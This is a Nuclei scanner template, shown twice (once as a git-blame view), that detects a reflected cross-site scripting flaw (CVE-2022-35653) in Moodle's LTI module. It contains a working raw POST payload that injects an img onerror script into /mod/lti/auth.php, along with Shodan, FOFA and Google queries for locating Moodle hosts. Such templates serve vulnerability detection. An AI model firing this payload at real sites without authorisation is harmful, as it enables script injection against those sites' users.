nuclei-templates/http/cves/2022/CVE-2022-35653.yaml

id: CVE-2022-35653

info:
  name: Moodle LTI module Reflected - Cross-Site Scripting
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website to steal potentially sensitive information, change appearance of the web page, can perform phishing and drive-by-download attacks.
  reference:
    - http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-72299
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35653
    - https://bugzilla.redhat.com/show_bug.cgi?id=2106277
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MOKYVRNFNAODP2XSMGJ5CRDUZCZKAR3/
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTKUSFPSYFINSQFSOHDQIDVE6FWBEU6V/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-35653
    cwe-id: CWE-79
    epss-score: 0.01147
    epss-percentile: 0.84758
    cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moodle
    product: moodle
    shodan-query:
      - title:"Moodle"
      - cpe:"cpe:2.3:a:moodle:moodle"
      - http.title:"moodle"
    fofa-query: title="moodle"
    google-query: intitle:"moodle"
  tags: cve,cve2022,moodle,xss

http:
  - raw:
      - |
        POST /mod/lti/auth.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        xxx"><img/src%3d'x'onerror%3dalert('document_domain')>=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img/src='x'onerror=alert('document_domain')>"
          - "moodle-editor"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205247117ab1ea8a0164b3af3ae9741d68d7b4b01a5e9473c23cb2dee56cf239f40221008691d5bd47249844fcffa0180fff99f17dd919d70ca3822e86f1aaf56bcd973e:922c64590222798bb761d5b6d8e72950
Create CVE-2022-35653.yaml 2023-11-07 18:02:27 +00:00			`id: CVE-2022-35653`

			`info:`
			`name: Moodle LTI module Reflected - Cross-Site Scripting`
			`author: iamnoooob,pdresearch`
			`severity: medium`
			`description: \|`
			`A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website to steal potentially sensitive information, change appearance of the web page, can perform phishing and drive-by-download attacks.`
			`reference:`
			`- http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-72299`
Update CVE-2022-35653.yaml 2023-11-07 18:37:11 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-35653`
TemplateMan Update [Wed Nov 8 06:56:05 UTC 2023] :robot: 2023-11-08 06:56:05 +00:00			`- https://bugzilla.redhat.com/show_bug.cgi?id=2106277`
			`- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MOKYVRNFNAODP2XSMGJ5CRDUZCZKAR3/`
			`- https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTKUSFPSYFINSQFSOHDQIDVE6FWBEU6V/`
Create CVE-2022-35653.yaml 2023-11-07 18:02:27 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
TemplateMan Update [Wed Nov 8 06:56:05 UTC 2023] :robot: 2023-11-08 06:56:05 +00:00			`cve-id: CVE-2022-35653`
Create CVE-2022-35653.yaml 2023-11-07 18:02:27 +00:00			`cwe-id: CWE-79`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.01147`
			`epss-percentile: 0.84758`
TemplateMan Update [Wed Nov 8 06:56:05 UTC 2023] :robot: 2023-11-08 06:56:05 +00:00			`cpe: cpe:2.3:a:moodle:moodle::::::::`
Create CVE-2022-35653.yaml 2023-11-07 18:02:27 +00:00			`metadata:`
Update CVE-2022-35653.yaml 2023-11-07 18:37:11 +00:00			`verified: true`
TemplateMan Update [Wed Nov 8 06:56:05 UTC 2023] :robot: 2023-11-08 06:56:05 +00:00			`max-request: 1`
Create CVE-2022-35653.yaml 2023-11-07 18:02:27 +00:00			`vendor: moodle`
			`product: moodle`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- title:"Moodle"`
			`- cpe:"cpe:2.3:a:moodle:moodle"`
			`- http.title:"moodle"`
product/queries updated 2024-05-31 19:23:20 +00:00			`fofa-query: title="moodle"`
			`google-query: intitle:"moodle"`
Create CVE-2022-35653.yaml 2023-11-07 18:02:27 +00:00			`tags: cve,cve2022,moodle,xss`

			`http:`
			`- raw:`
			`- \|`
			`POST /mod/lti/auth.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

Update CVE-2022-35653.yaml 2023-11-07 18:37:11 +00:00			`xxx"><img/src%3d'x'onerror%3dalert('document_domain')>=1`
Create CVE-2022-35653.yaml 2023-11-07 18:02:27 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Update CVE-2022-35653.yaml 2023-11-07 18:37:11 +00:00			`- "<img/src='x'onerror=alert('document_domain')>"`
matcher update 2023-11-07 18:44:46 +00:00			`- "moodle-editor"`
Create CVE-2022-35653.yaml 2023-11-07 18:02:27 +00:00			`condition: and`

matcher update 2023-11-07 18:44:46 +00:00			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`

Create CVE-2022-35653.yaml 2023-11-07 18:02:27 +00:00			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4a0a0047304502205247117ab1ea8a0164b3af3ae9741d68d7b4b01a5e9473c23cb2dee56cf239f40221008691d5bd47249844fcffa0180fff99f17dd919d70ca3822e86f1aaf56bcd973e:922c64590222798bb761d5b6d8e72950`